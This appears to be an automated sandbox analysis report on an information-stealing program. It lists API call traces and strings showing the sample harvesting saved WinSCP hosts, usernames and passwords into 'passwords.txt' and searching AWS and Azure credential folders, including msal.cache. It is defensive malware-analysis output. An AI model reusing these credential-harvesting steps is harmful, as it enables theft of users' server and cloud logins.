memset.MSVCRT ref: 0040E83D
memset.MSVCRT ref: 0040E84B
memset.MSVCRT ref: 0040E85C
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9A2
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4

Strings

Security, xrefs: 0040E8A4
UserName, xrefs: 0040EAB1
Soft: WinSCP, xrefs: 0040E92B
:22, xrefs: 0040EA43
Password, xrefs: 0040EB32
UseMasterPassword, xrefs: 0040E89F
Login: , xrefs: 0040EA73
passwords.txt, xrefs: 0040EC88
Host: , xrefs: 0040E955
Password: , xrefs: 0040EB43
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E871
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E8E9
PortNumber, xrefs: 0040E9DE
HostName, xrefs: 0040E993

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$Value$Open$EnumH_prolog
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 784052110-2798830873
Opcode ID: d6ff7ab9134dee6953898bd7907ae3372015558f36fdf9e74d883f669c7394dd
Instruction ID: 89295896da61250e7cefd1c96a7d7708b6de7757bceb80d1fe37bfb71a37c9ed
Opcode Fuzzy Hash: d6ff7ab9134dee6953898bd7907ae3372015558f36fdf9e74d883f669c7394dd
Instruction Fuzzy Hash: BCF11CB1D0015DAEDB11EBE1CC41FEEBB7CAF18304F5441BBE515B2182DA785A48CB65

Function 004083DC Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 258stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004083E1

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004084E1
GetFileSize.KERNEL32(00000000,00000000), ref: 004084E9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004084F5
??_U@YAPAXI@Z.MSVCRT ref: 004084FF
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408510
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040851C
HeapAlloc.KERNEL32(00000000), ref: 00408523
StrStrA.SHLWAPI(?), ref: 00408535
StrStrA.SHLWAPI(-00000010), ref: 0040854F
lstrcat.KERNEL32(00000000), ref: 00408563
lstrcat.KERNEL32(00000000,00000000), ref: 00408575
lstrcat.KERNEL32(00000000,00425DA0), ref: 00408583
lstrcat.KERNEL32(00000000,00000000), ref: 00408595
lstrcat.KERNEL32(00000000,00425DA4), ref: 004085A3
lstrcat.KERNEL32(00000000), ref: 004085B2
lstrcat.KERNEL32(00000000,-00000010), ref: 004085BC
lstrcat.KERNEL32(00000000,00425DA8), ref: 004085CA
StrStrA.SHLWAPI(-000000FE), ref: 004085DA
StrStrA.SHLWAPI(00000014), ref: 004085EA
lstrcat.KERNEL32(00000000), ref: 004085FE

Part of subcall function 004082DE: memset.MSVCRT ref: 00408305
Part of subcall function 004082DE: lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
Part of subcall function 004082DE: CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
Part of subcall function 004082DE: memcpy.MSVCRT ref: 00408391

lstrcat.KERNEL32(00000000,00000000), ref: 0040860F
lstrcat.KERNEL32(00000000,00425DAC), ref: 0040861D
StrStrA.SHLWAPI(-000000FE), ref: 0040862D
StrStrA.SHLWAPI(00000014), ref: 0040863D
lstrcat.KERNEL32(00000000), ref: 00408651

Part of subcall function 004082DE: lstrcat.KERNEL32(00425BDF,00425BE3), ref: 004083B8
Part of subcall function 004082DE: lstrcat.KERNEL32(00425BDF,00425BE6), ref: 004083D0

lstrcat.KERNEL32(00000000,00000000), ref: 00408662
lstrcat.KERNEL32(00000000,00425DB0), ref: 00408670
lstrcat.KERNEL32(00000000,00425DB4), ref: 0040867E
StrStrA.SHLWAPI(-000000FE), ref: 0040868E
lstrlenA.KERNEL32(00000000), ref: 004086A4
memset.MSVCRT ref: 004086F7
CloseHandle.KERNEL32(00000000), ref: 00408700

Strings

passwords.txt, xrefs: 004086B6

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$H_prologlstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
String ID: passwords.txt
API String ID: 2199717062-347816968
Opcode ID: df44b3b2cd0831200b6f82ad19016b65bee135b59fab6d4847eb0a6aa4af722a
Instruction ID: 74ae5be6afe1e2d88f77f626dab05c628996e9a235834d6add9aa2487cc7bb77
Opcode Fuzzy Hash: df44b3b2cd0831200b6f82ad19016b65bee135b59fab6d4847eb0a6aa4af722a
Instruction Fuzzy Hash: BCA16A72800169EFDB11ABE0DD49EEEBF7AFF19314F100439F611A21A1DB741A09CB65

Function 00417330 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
GetProcAddress.KERNEL32 ref: 0041737A
GetProcAddress.KERNEL32 ref: 00417391
GetProcAddress.KERNEL32 ref: 004173A8
GetProcAddress.KERNEL32 ref: 004173BF
GetProcAddress.KERNEL32 ref: 004173D6
GetProcAddress.KERNEL32 ref: 004173ED
GetProcAddress.KERNEL32 ref: 00417404
GetProcAddress.KERNEL32 ref: 0041741B
GetProcAddress.KERNEL32 ref: 00417432
GetProcAddress.KERNEL32 ref: 00417449
GetProcAddress.KERNEL32 ref: 00417460
GetProcAddress.KERNEL32 ref: 00417477
GetProcAddress.KERNEL32 ref: 0041748E
GetProcAddress.KERNEL32 ref: 004174A5
GetProcAddress.KERNEL32 ref: 004174BC
GetProcAddress.KERNEL32 ref: 004174D3
GetProcAddress.KERNEL32 ref: 004174EA
GetProcAddress.KERNEL32 ref: 00417501
GetProcAddress.KERNEL32 ref: 00417518
GetProcAddress.KERNEL32 ref: 0041752F
LoadLibraryA.KERNEL32 ref: 00417540
LoadLibraryA.KERNEL32 ref: 00417551
LoadLibraryA.KERNEL32 ref: 00417562
LoadLibraryA.KERNEL32 ref: 00417573
LoadLibraryA.KERNEL32 ref: 00417584
GetProcAddress.KERNEL32(75A70000), ref: 0041759F
GetProcAddress.KERNEL32(75290000), ref: 004175BA
GetProcAddress.KERNEL32 ref: 004175D1
GetProcAddress.KERNEL32(75BD0000), ref: 004175EC
GetProcAddress.KERNEL32(75450000), ref: 00417607
GetProcAddress.KERNEL32(76E90000), ref: 00417622
GetProcAddress.KERNEL32 ref: 00417639

Strings

kernel32.dll, xrefs: 00417330

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: kernel32.dll
API String ID: 2238633743-1793498882
Opcode ID: 456b25a0cd971aede1948dc80c935459e1bed061efa79df4c74d3183b5f1786d
Instruction ID: 1e89812948c469db96aeb5d4d8b58dd49809b204df9ca9e9fbbd52ba925c3bf0
Opcode Fuzzy Hash: 456b25a0cd971aede1948dc80c935459e1bed061efa79df4c74d3183b5f1786d
Instruction Fuzzy Hash: D8711A7E811620EFEB525FA0FD08A253BB7F70AB01B14713AEA05C6231E7764961EF14

Function 19315660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

_node, xrefs: 1931579E
CREATE TABLE x(%.*s INT, xrefs: 193157CA
,%.*s, xrefs: 19315804, 19315835
Auxiliary rtree columns must be last, xrefs: 193156B3, 193158B3

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: 507059aa4d727ccbf91f567bdaf1da54600847772fc894c4f1611e97e022d007
Instruction ID: 0096eae7da4fc21d82b68b4fdc33458ee0326b41133ea4040c8c836564f1ab15
Opcode Fuzzy Hash: 507059aa4d727ccbf91f567bdaf1da54600847772fc894c4f1611e97e022d007
Instruction Fuzzy Hash: 39F1F2B55003459FD718CF24C880A5BB7E8EF48305F8C4629FD4A9B2A1D736FA55CBA2

Function 1925CC80 Relevance: 47.7, APIs: 15, Strings: 12, Instructions: 470COMMON

Download Yara Rule

Strings

%02d:%02d:%02d, xrefs: 1925D12E
%lld, xrefs: 1925D0EE
%.3f, xrefs: 1925D0BF
%04d, xrefs: 1925D1CE
%03d, xrefs: 1925CF81, 1925CF8B
%2d, xrefs: 1925CE27
%06.3f, xrefs: 1925CE5F
u, xrefs: 1925D16D
%02d, xrefs: 1925CE2C, 1925CE34, 1925CF27, 1925CF6F, 1925CFCE, 1925CFE9, 1925D10A
%04d-%02d-%02d, xrefs: 1925CE82
%.16g, xrefs: 1925CFB3
%02d:%02d, xrefs: 1925D080

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
API String ID: 0-1613945299
Opcode ID: 070f9d57c2bf0ff7d7989604c656383cf3b3bea595668d3d9f83236d1284002a
Instruction ID: 14237774a2052c1c63d2be37af73ee0476412cdb2c2d8d82b7bbb5446f32b19f
Opcode Fuzzy Hash: 070f9d57c2bf0ff7d7989604c656383cf3b3bea595668d3d9f83236d1284002a
Instruction Fuzzy Hash: 6EF1D2B5A08341ABF310CA64CC41F9BB3EABF89340F5C9A1DF985D7242E635EA45C752

Function 192D9120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

_node, xrefs: 192D9202
,%s, xrefs: 192D9297
CREATE TABLE x(_shape, xrefs: 192D9268

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: 56f0604f41f1090026dcc6255aebfa0dadf36492eb0e5ad763e3fda58b83f8aa
Instruction ID: 5b436b76953300a27129b89d1c173769c524cad67e80ec624d64c8c252570816
Opcode Fuzzy Hash: 56f0604f41f1090026dcc6255aebfa0dadf36492eb0e5ad763e3fda58b83f8aa
Instruction Fuzzy Hash: EFC102B96003869BD7148F34CD84B1777E9FF44309F184628FD4A96292DB36FA15CBA2

Function 1938B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

,%s%s%s, xrefs: 1938B137
(blob), xrefs: 1938B26C
program, xrefs: 1938B2FB
BINARY, xrefs: 1938B0D3
%lld, xrefs: 1938B1DA, 1938B24C
k(%d, xrefs: 1938B0A5
NULL, xrefs: 1938B267, 1938B324, 1938B325
%c%u, xrefs: 1938B2C3
%.16g, xrefs: 1938B217
%s(%d), xrefs: 1938B1B3
vtab:%p, xrefs: 1938B283
%.18s-%s, xrefs: 1938B192

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: 4705459aef9e9e64fe8f1debcc431bf601e61d4216d7bbd409f8e49ad96fcb07
Instruction ID: 170c67d1a0649db134e97241517ac9398263faca4d188d79c2d5ce3f548f8bad
Opcode Fuzzy Hash: 4705459aef9e9e64fe8f1debcc431bf601e61d4216d7bbd409f8e49ad96fcb07
Instruction Fuzzy Hash: 3091F7719083469BD708CF14C844B6B77F9BF85344F6C8A5DF8858B253D772E90687A2

Function 1924D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

offsets, xrefs: 1924D956
matchinfo, xrefs: 1924D970, 1924D98A
unicode61, xrefs: 1924D90B
snippet, xrefs: 1924D93C
fts4aux, xrefs: 1924D840
fts3_tokenizer, xrefs: 1924D921
fts4, xrefs: 1924D9F0
porter, xrefs: 1924D8EE
fts3, xrefs: 1924D9CA
optimize, xrefs: 1924D9A4
fts3tokenize, xrefs: 1924DA27
simple, xrefs: 1924D8A9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 09f2f817dc4abf7f00ef5044bd5a19a991861348b3aaaf1635b438eeb8b6f5a0
Instruction ID: 8351011848ef41c03c13333a2a002a5b312021963c8f5637aed4ebfc2efa9f01
Opcode Fuzzy Hash: 09f2f817dc4abf7f00ef5044bd5a19a991861348b3aaaf1635b438eeb8b6f5a0
Instruction Fuzzy Hash: 6E513AB8B0436267F3149A649DC5F9B37E8AF01619F7C4134FD49A7282E768F605C2E2

Function 00416791 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416796
memset.MSVCRT ref: 004167B6

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

lstrcat.KERNEL32(?,00000000), ref: 004167DC
lstrcat.KERNEL32(?,\.azure\), ref: 004167F9

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F

memset.MSVCRT ref: 00416834
lstrcat.KERNEL32(?,00000000), ref: 0041685F
lstrcat.KERNEL32(?,\.aws\), ref: 0041687C

Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388

memset.MSVCRT ref: 004168B7
lstrcat.KERNEL32(?,00000000), ref: 004168E2
lstrcat.KERNEL32(?,\.IdentityService\), ref: 004168FF

Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9

memset.MSVCRT ref: 0041693A

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Azure\.azure, xrefs: 004167FF
\.aws\, xrefs: 00416870
Azure\.aws, xrefs: 00416882
*.*, xrefs: 00416804
\.IdentityService\, xrefs: 004168F3
msal.cache, xrefs: 0041690A
\.azure\, xrefs: 004167ED
*.*, xrefs: 00416887
Azure\.IdentityService, xrefs: 00416905

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2836893066-974132213
Opcode ID: 11dc4bf3c878bfe89effc8ea28c6ebbe53e99ab4ba69fbc49f53d48ec009460c
Instruction ID: bee94e7e3baf3fafe0f6379a1f42c20d34aa1a64c6f182653504fcfef76d90c4
Opcode Fuzzy Hash: 11dc4bf3c878bfe89effc8ea28c6ebbe53e99ab4ba69fbc49f53d48ec009460c
Instruction Fuzzy Hash: DC41A6B1D0022CBADB11EBE4DC46EEE7B7CAB1C304F40456FB554A3182DA7C97888B65

Function 193C7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname2, xrefs: 193C8094
winGetTempname5, xrefs: 193C8233
etilqs_, xrefs: 193C824C
winGetTempname4, xrefs: 193C8355
winGetTempname1, xrefs: 193C817B

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: 3e6b9d114787a1a332f1798f95a424b4bd73bd1f2c710322a75f048452b8da0f
Instruction ID: 0c3b8b06883a771e27a344eb409f67c474365f78402632a949028023f592c283
